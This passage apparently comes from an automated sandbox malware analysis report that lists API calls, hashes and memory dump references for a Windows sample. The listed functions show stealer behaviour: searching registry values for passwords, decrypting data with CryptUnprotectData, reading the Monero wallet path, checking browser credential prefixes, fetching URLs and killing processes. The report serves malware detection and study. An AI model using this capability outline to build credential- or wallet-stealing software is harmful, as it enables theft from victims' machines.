                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                              • String ID: :
                              • API String ID: 398153587-3653984579
                              • Opcode ID: 7ebde50406af1dd6dd61bbfe7580bbef568c87c63c58ae9908b3264c418649e8
                              • Instruction ID: 73d2939241333d8dc57b2f86e484edb5a01f87244b5f52c3685be1829acce8db
                              • Opcode Fuzzy Hash: 7ebde50406af1dd6dd61bbfe7580bbef568c87c63c58ae9908b3264c418649e8
                              • Instruction Fuzzy Hash: 2031777291421DEFCF50DBA4DC48D6FBF79FB88710B14451DE54693200DB74A981C795
                              Function 005A8240 Relevance: 12.7, APIs: 10, Instructions: 175stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(00000000), ref: 005A829C
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A82D3
                              • lstrlen.KERNEL32(00000000), ref: 005A82F0
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A8327
                              • lstrlen.KERNEL32(00000000), ref: 005A8344
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A837B
                              • lstrlen.KERNEL32(00000000), ref: 005A8398
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A83C7
                              • lstrlen.KERNEL32(00000000), ref: 005A83E1
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A8410
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: e2de98a7c58a058847cd8b8397e5b6e686abec70cdc5bbf1c31c1123dc333ae1
                              • Instruction ID: 9a2a82f681dcd8197a20d9c6a9f58ba2386c144fc3cba681fbac6ae51f8f062c
                              • Opcode Fuzzy Hash: e2de98a7c58a058847cd8b8397e5b6e686abec70cdc5bbf1c31c1123dc333ae1
                              • Instruction Fuzzy Hash: 02513A71901613ABDB149F69D858ABEBFA8FF49704F158518AC06DB244EB34ED50CBE0
                              Function 00597710 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 208registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00597745
                              • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0059778A
                              • StrStrA.SHLWAPI(?,Password), ref: 005977F8
                                • Part of subcall function 00597690: GetProcessHeap.KERNEL32(00000008,00000400), ref: 0059769E
                                • Part of subcall function 00597690: RtlAllocateHeap.NTDLL(00000000), ref: 005976A5
                                • Part of subcall function 00597690: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 005976CD
                                • Part of subcall function 00597690: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 005976ED
                                • Part of subcall function 00597690: LocalFree.KERNEL32(?), ref: 005976F7
                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0059782C
                              • HeapFree.KERNEL32(00000000), ref: 00597833
                              • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 00597975
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                              • String ID: Password
                              • API String ID: 356768136-3434357891
                              • Opcode ID: d8d32f86fb75ae8f0ceb8d18ce7c43588c2c8a987f2f0c3e2855cc6fd1dbdd53
                              • Instruction ID: 7bf55cee5ca582eff8844279d3bc0193def149c46ff705f15988051bc0c40829
                              • Opcode Fuzzy Hash: d8d32f86fb75ae8f0ceb8d18ce7c43588c2c8a987f2f0c3e2855cc6fd1dbdd53
                              • Instruction Fuzzy Hash: 8C7131B1D1011D9BDF10DF95CC84AEEBBB9FF49300F14456AE509E7200EB756A85CBA1
                              Function 00591000 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 37registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00591015
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0059101C
                              • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00591039
                              • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00591053
                              • RegCloseKey.ADVAPI32(?), ref: 0059105D
                              Strings
                              • SOFTWARE\monero-project\monero-core, xrefs: 0059102F
                              • wallet_path, xrefs: 0059104D
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                              • API String ID: 3225020163-4244082812
                              • Opcode ID: c0d6a2f4998bbaa7f77e983463290f174645d5a29ee7b9437721290038d9f90c
                              • Instruction ID: 555177933baf5eefe0c4b5dc1d3619ca21fba14411d15788ed6f950ba24c4ddd
                              • Opcode Fuzzy Hash: c0d6a2f4998bbaa7f77e983463290f174645d5a29ee7b9437721290038d9f90c
                              • Instruction Fuzzy Hash: 04F0907564030ABFD7109BE0AC4DFAF7B3CEB04711F104058FF05E2281E6B49A4487A8
                              Function 00599E40 Relevance: 12.2, APIs: 5, Strings: 3, Instructions: 183memorystringCOMMON
                              Download Yara Rule
                              APIs
                              • memcmp.MSVCRT(?,v20,00000003), ref: 00599E64
                              • memcmp.MSVCRT(?,v10,00000003), ref: 00599EA2
                              • LocalAlloc.KERNEL32(00000040), ref: 00599F07
                                • Part of subcall function 005B7210: lstrcpy.KERNEL32(00000000,ERROR), ref: 005B722E
                              • lstrcpy.KERNEL32(00000000,005C5210), ref: 0059A012
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpymemcmp$AllocLocal
                              • String ID: @$v10$v20
                              • API String ID: 102826412-278772428
                              • Opcode ID: fe56aee93fc0eb1d818e61137467e37314c38e8ee34309837ea31b1877e8e8a6
                              • Instruction ID: 104bf8d84609636edd15b63f3b3ae84ca1c32c82d8a711d6262eea94447fc0ab
                              • Opcode Fuzzy Hash: fe56aee93fc0eb1d818e61137467e37314c38e8ee34309837ea31b1877e8e8a6
                              • Instruction Fuzzy Hash: 2C51A135A1120AABDF10EFA8CC49B9EBFA4FF84314F154428F949AB251DB70ED458BD0
                              Function 00595570 Relevance: 12.1, APIs: 8, Instructions: 112networkmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00595589
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00595590
                              • InternetOpenA.WININET(005BD014,00000000,00000000,00000000,00000000), ref: 005955A6
                              • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,04000100,00000000), ref: 005955C1
                              • InternetReadFile.WININET(?,?,00000400,00000001), ref: 005955EC
                              • memcpy.MSVCRT(00000000,?,00000001), ref: 00595611
                              • InternetCloseHandle.WININET(?), ref: 0059562B
                              • InternetCloseHandle.WININET(00000000), ref: 00595632
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                              • String ID:
                              • API String ID: 1008454911-0
                              • Opcode ID: 9e46ba51795ee42dd6ac05a488984de2cf86d8febfb89bd9c1e18ea2339a66e6
                              • Instruction ID: 7f760440a1fdb2a34afc44435ab7ceaa9b2d7c03b6336a331e5df1652981403b
                              • Opcode Fuzzy Hash: 9e46ba51795ee42dd6ac05a488984de2cf86d8febfb89bd9c1e18ea2339a66e6
                              • Instruction Fuzzy Hash: 07416E70A00605AFDB15CF55CC48FA9BBB4FF48304F68C1ADE6089B290E7759951CF98
                              Function 005B4760 Relevance: 12.1, APIs: 8, Instructions: 52processCOMMON
                              Download Yara Rule
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 005B4779
                              • Process32First.KERNEL32(00000000,00000128), ref: 005B4789
                              • Process32Next.KERNEL32(00000000,00000128), ref: 005B479B
                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 005B47BC
                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 005B47CB
                              • CloseHandle.KERNEL32(00000000), ref: 005B47D2
                              • Process32Next.KERNEL32(00000000,00000128), ref: 005B47E0
                              • CloseHandle.KERNEL32(00000000), ref: 005B47EB
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                              • String ID:
                              • API String ID: 3836391474-0
                              • Opcode ID: 954d9591b90e3fa67d1f076f80c4e3e1924a0944afa3c8377ecb141d627793db
                              • Instruction ID: 5917362075850ac5280cdee279be7efc2fa60adbe633bd95eacf351dff0e06ce
                              • Opcode Fuzzy Hash: 954d9591b90e3fa67d1f076f80c4e3e1924a0944afa3c8377ecb141d627793db
                              • Instruction Fuzzy Hash: 33019271641219ABE7705B209C8DFEA7B7CFB08751F044198FA0591082EF78DD91CF65
                              Function 0059E4EF Relevance: 10.9, APIs: 7, Instructions: 442stringfileCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 0059E8C3
                              • lstrcpy.KERNEL32(00000000,?), ref: 0059E8F5
                              • lstrcpy.KERNEL32(00000000,?), ref: 0059E944
                              • lstrcpy.KERNEL32(00000000,?), ref: 0059E96A
                              • lstrcpy.KERNEL32(00000000,?), ref: 0059E9A2
                              • FindNextFileA.KERNEL32(00000000,?), ref: 0059E9D8
                              • FindClose.KERNEL32(00000000), ref: 0059E9E7
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$CloseFileNext
                              • String ID:
                              • API String ID: 1875835556-0
                              • Opcode ID: 6a23ae4e1f8a05cebaaa1a642f9bc65d65907758c72249c18442a33fa10e44ae
                              • Instruction ID: b066cb838690a8c7b7cd1da1db65f772d920227011f093b0096e1287d8f81a24
                              • Opcode Fuzzy Hash: 6a23ae4e1f8a05cebaaa1a642f9bc65d65907758c72249c18442a33fa10e44ae
                              • Instruction Fuzzy Hash: 1802EA70A012158FDF68CF19C58AB65BBE5BF44714F1DC1ADD8499B2A2D736DC82CB80
                              Function 0059E574 Relevance: 10.9, APIs: 7, Instructions: 442stringfileCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 0059E8C3
                              • lstrcpy.KERNEL32(00000000,?), ref: 0059E8F5
                              • lstrcpy.KERNEL32(00000000,?), ref: 0059E944
                              • lstrcpy.KERNEL32(00000000,?), ref: 0059E96A
                              • lstrcpy.KERNEL32(00000000,?), ref: 0059E9A2
                              • FindNextFileA.KERNEL32(00000000,?), ref: 0059E9D8
                              • FindClose.KERNEL32(00000000), ref: 0059E9E7
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$CloseFileNext
                              • String ID:
                              • API String ID: 1875835556-0
                              • Opcode ID: 6a23ae4e1f8a05cebaaa1a642f9bc65d65907758c72249c18442a33fa10e44ae
                              • Instruction ID: b066cb838690a8c7b7cd1da1db65f772d920227011f093b0096e1287d8f81a24
                              • Opcode Fuzzy Hash: 6a23ae4e1f8a05cebaaa1a642f9bc65d65907758c72249c18442a33fa10e44ae
                              • Instruction Fuzzy Hash: 1802EA70A012158FDF68CF19C58AB65BBE5BF44714F1DC1ADD8499B2A2D736DC82CB80
                              Function 0059E595 Relevance: 10.9, APIs: 7, Instructions: 442stringfileCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 0059E8C3
                              • lstrcpy.KERNEL32(00000000,?), ref: 0059E8F5
                              • lstrcpy.KERNEL32(00000000,?), ref: 0059E944
                              • lstrcpy.KERNEL32(00000000,?), ref: 0059E96A
                              • lstrcpy.KERNEL32(00000000,?), ref: 0059E9A2
                              • FindNextFileA.KERNEL32(00000000,?), ref: 0059E9D8
                              • FindClose.KERNEL32(00000000), ref: 0059E9E7
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
